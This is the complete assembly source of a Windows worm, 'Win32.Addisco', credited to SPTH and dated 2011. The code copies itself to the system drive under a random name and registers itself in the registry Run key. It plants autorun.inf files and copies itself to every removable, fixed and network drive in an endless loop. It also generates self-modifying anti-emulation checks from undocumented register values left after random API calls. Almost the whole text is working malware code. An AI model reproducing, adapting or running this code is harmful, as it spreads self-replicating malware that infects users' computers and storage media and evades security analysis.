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- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;;
- ;; Win32.Addisco
- ;; by SPTH
- ;; October 2011
- ;;
- ;;
- ;; This is a worm which spreads via network/removable/USB drives.
- ;;
- ;; The special thing is that it is able to find and implement
- ;; new Anti-Emulation tricks autonomously.
- ;;
- ;; This is done via analysing the undocumented leftover values in ECX
- ;; and EDX after an random Windows API call. The API is analysed in
- ;; a Black-Box test - if for a given set of parameters a constant
- ;; ECX+EDX value is found, a new Anti-Emulation trick is created for
- ;; the next generation.
- ;;
- ;; The worm is aware of "Address Space Layout Randomization" (ASLR).
- ;;
- ;; More details can be found in an article "Dynamic Anti-Emulation
- ;; using Blackbox Analysis".
- ;;
- ;; This analyse of the environment and autonomous developement of new
- ;; self-defending trick seems to be a simple form of machine learning. :-)
- ;;
- ;;
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- include 'E:\Programme\FASM\INCLUDE\'
- .data
- constFileSize EQU 0x1000
- constCodeStart EQU 0x0400
- hMyFileName dd 0x0
- hFileHandle dd 0x0
- hMapHandle dd 0x0
- hMapViewAddress dd 0x0
- hVEH dd 0x0
- bException dd 0x0
- sESP dd 0x0
- s2ESP dd 0x0
- RandomNumber dd 0x0
- RandOrdinal dd 0x0
- RndFctAddress dd 0x0
- RndFctArguments dd 0x0
- rept 0x10 c
- {
- RndFctArg#c dd 0x0
- }
- RndFct_RV_ECX dd 0x0
- RndFct_RV_EDX dd 0x0
- kernel32 db "kernel32.dll",0x0
- hKernel dd 0x0
- nOSVersion dd 0x0
- SpaceForHDC: dd 0x0 ; should be 0x0, C:\
- RandomFileName: times 13 db 0x0
- SpaceForHDC2: dd 0x0 ; should be 0x0, X:\
- RandomFileName2:times 13 db 0x0
- stKey: times 47 db 0x0 ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0x0
- hKey dd 0x0
- stAutoRunContent: times 52 db 0x0
- stAutorunWithDrive db 0x0, 0x0, 0x0 ; "X:\"
- stAutoruninf: times 12 db 0x0 ; "autorun.inf"
- hCreateFileAR dd 0x0
- hCreateFileMappingAR dd 0x0
- macro VEH_TRY c*
- {
- mov dword[sESP], esp
- push VEH_Handler#c
- push 0x1
- stdcall dword[AddVectoredExceptionHandler]
- mov dword[hVEH], eax
- }
- macro VEH_EXCEPTION c*
- {
- mov dword[bException], 0x0
- jmp VEH_NoException#c
- VEH_Handler#c:
- mov esp, dword[sESP]
- mov dword[bException], 0x1
- }
- macro VEH_END c*
- {
- VEH_NoException#c:
- mov eax, dword[hVEH]
- push eax
- stdcall dword[RemoveVectoredExceptionHandler]
- }
- .code
- start:
- stdcall dword[GetVersion]
- cmp eax, 0x0A280105 ; Version here
- jne StartEngine ; WrongVersion of OS
- push kernel32
- stdcall dword[LoadLibrary]
- add eax, 0x1234'5678
- times (0x10*5 + 2 + 6 + 2 + 1): nop ; 0x10*push + call + cmp + je + ret
- ; ###########################################################################
- ; #####
- ; ##### Preparation (copy file, get kernel, ...)
- ; #####
- StartEngine:
- stdcall dword[GetVersion]
- mov dword[nOSVersion], eax
- push 0x8007
- stdcall dword[SetErrorMode]
- stdcall dword[GetCommandLineA]
- mov dword[hMyFileName], eax
- cmp byte[eax], '"'
- jne FileNameIsFine
- inc eax
- mov dword[hMyFileName], eax
- FindFileNameLoop:
- inc eax
- cmp byte[eax], '"'
- jne FindFileNameLoop
- mov byte[eax], 0x0
- FileNameIsFine:
- stdcall dword[GetTickCount]
- mov dword[RandomNumber], eax
- xor esi, esi
- CopyFileAndRegEntryMore:
- mov ebx, 26
- mov ecx, 97
- call CreateSpecialRndNumber
- mov byte[RandomFileName+esi], dl
- inc esi
- cmp esi, 8
- jb CopyFileAndRegEntryMore
- mov eax, ".exe"
- mov dword[RandomFileName+esi], eax
- mov al, "C"
- mov byte[SpaceForHDC+1], al
- mov al, ":"
- mov byte[SpaceForHDC+2], al
- mov al, "\"
- mov byte[SpaceForHDC+3], al
- push FALSE
- push SpaceForHDC+1
- push dword[hMyFileName]
- stdcall dword[CopyFileA]
- push kernel32 ; Get Kernel32
- stdcall dword[LoadLibrary]
- cmp eax, 0
- je SpreadKitty
- mov dword[hKernel], eax
- ; #####
- ; ##### Preparation (copy file, get kernel, ...)
- ; #####
- ; ###########################################################################
- ; ###########################################################################
- ; #####
- ; ##### call random API & save undocumented ECX&EDX
- ; #####
- SearchRandomAPI:
- call GetRandomNumber
- mov eax, dword[RandomNumber]
- and eax, (0x40 - 1)
- jz SpreadKitty ; Probabilistic quiting (1/64)
- call GetRandomNumber
- mov eax, dword[RandomNumber]
- and eax, (0x400 - 1) ; 0-1023
- mov dword[RandOrdinal], eax
- push dword[RandOrdinal]
- push dword[hKernel]
- stdcall dword[GetProcAddress]
- cmp eax, 0x0
- je SearchRandomAPI
- mov dword[RndFctAddress], eax
- mov dword[s2ESP], esp ; Save original ESP
- times 0x10: push 0 ; PUSH 16 parameters
- VEH_TRY FirstRun
- ; {
- stdcall dword[RndFctAddress] ; try it ;)
- ; }
- ; { ; no success :-/
- mov esp, dword[s2ESP] ; restore ESP
- ; }
- VEH_END FirstRun
- cmp dword[bException], 0x1
- je SearchRandomAPI
- ; Get Number of arguments used by this random API :)
- mov eax, esp
- sub eax, dword[sESP]
- shr eax, 2 ; eax/=4 -> number of arguments
- mov dword[RndFctArguments], eax
- mov esp, dword[s2ESP] ; restore ESP
- call RandomizeArguments
- call PushNArgumentsToStack
- VEH_TRY RealRun1
- ; {
- stdcall dword[RndFctAddress]
- mov dword[RndFct_RV_ECX], ecx
- mov dword[RndFct_RV_EDX], edx
- ; }
- ; {
- mov esp, dword[s2ESP] ; restore ESP
- ; }
- VEH_END RealRun1
- cmp dword[bException], 0x1
- je SearchRandomAPI
- ; Run again and compare ECX and EDX, just in case (Time-APIs and stuff like that, dependence on register values)
- call PushNArgumentsToStack
- VEH_TRY RealRun2
- ; {
- call RandomizeRegisters
- stdcall dword[RndFctAddress]
- sub ecx, dword[RndFct_RV_ECX]
- jz RealRun2ECX_OK
- xor eax, eax
- mov dword[eax], 42
- RealRun2ECX_OK:
- sub edx, dword[RndFct_RV_EDX]
- jz RealRun2EDX_OK
- xor eax, eax
- mov dword[eax], 42
- RealRun2EDX_OK:
- ; }
- ; {
- mov esp, dword[s2ESP] ; restore ESP
- ; }
- VEH_END RealRun2
- cmp dword[bException], 0x1
- je SearchRandomAPI
- ; #####
- ; ##### call random API & save undocumented ECX&EDX
- ; #####
- ; ###########################################################################
- ; ###########################################################################
- ; #####
- ; ##### Open New File
- ; #####
- push 0x0
- push 0x0
- push 0x0
- push SpaceForHDC+1
- stdcall dword[CreateFileA]
- je IVF_NoCreateFile
- mov dword[hFileHandle], eax
- push 0x0
- push constFileSize
- push 0x0 ; nFileSizeHigh=0 from above
- push 0x0
- push dword[hFileHandle]
- stdcall dword[CreateFileMappingA]
- cmp eax, 0x0
- je IVF_NoCreateMap
- mov dword[hMapHandle], eax
- push constFileSize
- push 0x0
- push 0x0
- push dword[hMapHandle]
- stdcall dword[MapViewOfFile]
- cmp eax, 0x0
- je IVF_NoMapView
- mov dword[hMapViewAddress], eax
- ; #####
- ; ##### Open New File
- ; #####
- ; ###########################################################################
- ; ###########################################################################
- ; #####
- ; ##### Change Anti-Debugging API call at code start
- ; #####
- add eax, constCodeStart
- mov ebx, dword[nOSVersion]
- mov dword[eax + 0x07], ebx ; write new OS
- mov ebx, dword[RndFctAddress] ; Change "add eax, NNNN"
- sub ebx, dword[hKernel] ; where NNNN=Functionaddress-Kerneladdress
- mov dword[eax + 0x19], ebx
- mov edi, RndFctArg1
- mov esi, eax
- add esi, 0x1D
- mov ecx, dword[RndFctArguments]
- jecxz NoFurtherPush
- MoreArgPush:
- add edi, 0x04
- mov byte[esi], 0x68 ; push
- mov ebx, dword[edi]
- mov dword[esi + 0x01], ebx ; argument
- add esi, 0x05
- dec ecx
- jnz MoreArgPush
- NoFurtherPush:
- mov word[esi], 0xD0FF ; call
- add esi, 0x2
- mov eax, dword[RndFct_RV_ECX]
- and eax, 0xFF00'0000
- mov ebx, dword[hKernel]
- and ebx, 0xFF00'0000
- cmp eax, ebx
- je NoECX_Kernel
- mov dword[esi], 0x0000'F981 ; cmp ecx, NNNN
- add esi, 0x2
- mov ebx, dword[RndFct_RV_ECX]
- mov dword[esi], ebx
- add esi, 0x4 ; value of ECX
- mov dword[esi], 0x00C3'0174 ; je ... + ret
- add esi, 0x3
- NoECX_Kernel:
- mov eax, dword[RndFct_RV_EDX]
- and eax, 0xFF00'0000
- mov ebx, dword[hKernel]
- and ebx, 0xFF00'0000
- cmp eax, ebx
- je NoEDX_Kernel
- mov dword[esi], 0x0000'FA81 ; cmp ecx, NNNN
- add esi, 0x2
- mov ebx, dword[RndFct_RV_EDX]
- mov dword[esi], ebx
- add esi, 0x4 ; value of EDX
- mov dword[esi], 0x00C3'0174 ; je ... + ret
- add esi, 0x3
- NoEDX_Kernel:
- mov ecx, constCodeStart+(StartEngine-start)
- add ecx, dword[hMapViewAddress]
- PaddingTheHead:
- mov byte[esi], 0x90
- inc esi
- cmp esi, ecx
- jne PaddingTheHead
- ; #####
- ; ##### Change Anti-Debugging API call at code start
- ; #####
- ; ###########################################################################
- ; ###########################################################################
- ; #####
- ; ##### Close New File
- ; #####
- IVF_CloseMapView:
- push dword[hMapViewAddress]
- stdcall dword[UnmapViewOfFile]
- IVF_NoMapView:
- push dword[hMapHandle]
- call dword[CloseHandle]
- IVF_NoCreateMap:
- push dword[hFileHandle]
- call dword[CloseHandle]
- IVF_NoCreateFile:
- ; #####
- ; ##### Close New File
- ; #####
- ; ###########################################################################
- ; ###########################################################################
- ; #####
- ; ##### Spread this kitty ;)
- ; #####
- SpreadKitty:
- ; Representation of "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- ; One could permute it - but too lazy for doing this task atm :)
- mov eax, stKey
- mov dword[eax+0x00], "SOFT"
- mov dword[eax+0x04], "WARE"
- mov dword[eax+0x08], "\Mic"
- mov dword[eax+0x0C], "roso"
- mov dword[eax+0x10], "ft\W"
- mov dword[eax+0x14], "indo"
- mov dword[eax+0x18], "ws\C"
- mov dword[eax+0x1C], "urre"
- mov dword[eax+0x20], "ntVe"
- mov dword[eax+0x24], "rsio"
- mov dword[eax+0x28], "n\Ru"
- mov byte[eax+0x2C], "n"
- push 0x0
- push hKey
- push 0x0
- push 0x0
- push 0x0
- push stKey
- stdcall dword[RegCreateKeyExA]
- push 16
- push SpaceForHDC+1
- push REG_SZ
- push 0x0
- push 0x0
- push dword[hKey]
- stdcall dword[RegSetValueExA]
- push dword[hKey]
- stdcall dword[RegCloseKey]
- xor eax, eax
- mov dword[stAutorunWithDrive], "X:\a"
- mov dword[stAutorunWithDrive+2], "\aut"
- mov dword[stAutoruninf+3], "orun"
- mov dword[stAutoruninf+7], ".inf"
- ; mov eax, "[Aut"
- mov dword[stAutoRunContent], "[Aut"
- mov dword[stAutoRunContent+0x04], "orun"
- mov dword[stAutoRunContent+0x08], 0x530A0D5D
- mov dword[stAutoRunContent+0x0C], "hell" ; !!!!!!!
- mov dword[stAutoRunContent+0x10], "Exec"
- mov dword[stAutoRunContent+0x14], "ute="
- mov eax, dword[RandomFileName] ; Filename: XXXXxxxx.exe
- mov dword[stAutoRunContent+0x18], eax
- mov eax, dword[RandomFileName+0x4] ; Filename: xxxxXXXX.exe
- mov dword[stAutoRunContent+0x1C], eax
- mov dword[stAutoRunContent+0x20], ".exe"
- mov dword[stAutoRunContent+0x24], 0x73550A0D
- mov dword[stAutoRunContent+0x28], "eAut"
- mov dword[stAutoRunContent+0x2C], "opla"
- mov dword[stAutoRunContent+0x30], 0x00313D79
- ; i like that coding style, roy g biv! :))
- push 51
- push 0x0
- push 0x0
- push 0x0
- push 51
- push 0x0
- push 0x0
- push 0x0
- push 0x0
- push 0x0
- push stAutoruninf
- stdcall dword[CreateFileA]
- push eax
- mov dword[hCreateFileAR], eax
- stdcall dword[CreateFileMappingA]
- push eax
- mov dword[hCreateFileMappingAR], eax
- stdcall dword[MapViewOfFile]
- xor cl, cl
- mov esi, stAutoRunContent
- MakeAutoRunInfoMore:
- mov bl, byte[esi]
- mov byte[eax], bl
- inc eax
- inc esi
- inc ecx
- cmp cl, 51
- jb MakeAutoRunInfoMore
- sub eax, 51
- push dword[hCreateFileAR]
- push dword[hCreateFileMappingAR]
- push eax
- stdcall dword[UnmapViewOfFile]
- stdcall dword[CloseHandle]
- stdcall dword[CloseHandle]
- mov dword[SpaceForHDC2+1], "A:\."
- mov eax, dword[RandomFileName]
- mov dword[RandomFileName2], eax ; XXXXxxxx.exe
- mov eax, dword[RandomFileName+0x04]
- mov dword[RandomFileName2+0x04], eax ; xxxxXXXX.exe
- mov eax, dword[RandomFileName+0x08]
- mov dword[RandomFileName2+0x08], eax ; .exe
- SpreadKittyAnotherTime:
- mov dword[SpaceForHDC2], 0x003A4100 ; 0x0, "A:", 0x0
- STKAnotherRound:
- push SpaceForHDC2+1
- stdcall dword[GetDriveTypeA]
- xor ebx, ebx ; 0 ... No Drive
- ; 1 ... Drive (without autorun.inf)
- ; 2 ... Drive (with autorun.inf)
- mov cl, '\'
- mov byte[SpaceForHDC2+3],cl
- ; mov byte[DriveNumber], al
- ; add byte[DriveNumber], 0x30
- cmp al, 0x2
- je STKWithAutoRun
- cmp al, 0x3
- je STKWithoutAutoRun
- cmp al, 0x4
- je STKWithAutoRun
- cmp al, 0x6
- je STKWithAutoRun
- jmp STKCreateEntriesForNextDrive
- STKWithAutoRun:
- push FALSE
- push stAutorunWithDrive
- push stAutoruninf
- stdcall dword[CopyFileA]
- STKWithoutAutoRun:
- push FALSE
- push SpaceForHDC2+1
- push SpaceForHDC+1
- stdcall dword[CopyFileA]
- STKCreateEntriesForNextDrive:
- xor eax, eax
- mov al, byte[SpaceForHDC2+1]
- cmp al, "Z"
- je SpreadThisKittyEnd
- inc al
- mov byte[SpaceForHDC2+1], al ; next drive
- mov byte[stAutorunWithDrive], al ; next drive
- mov byte[SpaceForHDC2+3], ah ; 0x0, "X:", 0x0
- jmp STKAnotherRound
- SpreadThisKittyEnd:
- call GetRandomNumber
- mov eax, dword[RandomNumber]
- and eax, (0x8000 - 1) ; 0-32 sec
- push eax
- stdcall dword[Sleep]
- call GetRandomNumber
- mov eax, dword[RandomNumber]
- and eax, (0x100-1)
- jnz SpreadKittyAnotherTime
- invoke MessageBox, 0x0, "If you don't crack the shell, you can't eat the nut.", "Learning the joy of self-defence :-)", 0x0
- jmp SpreadKittyAnotherTime
- ; #####
- ; ##### Spread this kitty ;)
- ; #####
- ; ###########################################################################
- GetRandomNumber:
- pushad
- xor edx, edx
- mov eax, dword[RandomNumber]
- mov ebx, 1103515245
- mul ebx ; EDX:EAX = EDX:EAX * EBX
- add eax, 12345
- mov dword[RandomNumber], eax
- popad
- ret
- CreateSpecialRndNumber:
- ; in: ebx, ecx
- ; out: edx=(rand()%ebx + ecx)
- call GetRandomNumber
- xor edx, edx
- mov eax, dword[RandomNumber]
- div ebx
- add edx, ecx
- ret
- RandomizeArguments:
- pushad
- mov ecx, 0x10
- mov edi, RndFctArg1
- CreateArgLoop:
- call GetRandomNumber
- mov eax, dword[RandomNumber]
- mov dword[edi], eax
- add edi, 4
- dec ecx
- jnz CreateArgLoop
- popad
- ret
- RandomizeRegisters:
- call GetRandomNumber
- mov ecx, dword[RandomNumber] ; Randomize ECX
- call GetRandomNumber
- mov edx, dword[RandomNumber] ; Randomize EDX
- call GetRandomNumber
- mov eax, dword[RandomNumber] ; Randomize EAX (in case of some "xchg ecx|edx, Reg32")
- call GetRandomNumber
- mov ebx, dword[RandomNumber] ; Randomize EBX (in case of some "xchg ecx|edx, Reg32")
- call GetRandomNumber ; prevent the output to depent on the input registers :)
- ret ; dont care about esi, edi, ebx. worst case -> no execution
- PushNArgumentsToStack:
- pop ebx ; return value
- mov ecx, dword[RndFctArguments]
- cmp ecx, 0
- je PushNArgumentsToStackFin
- mov edi, RndFctArg1
- PushArgs:
- push dword[edi]
- add edi, 4
- dec ecx
- jnz PushArgs
- PushNArgumentsToStackFin:
- push ebx
- ret
- .end start
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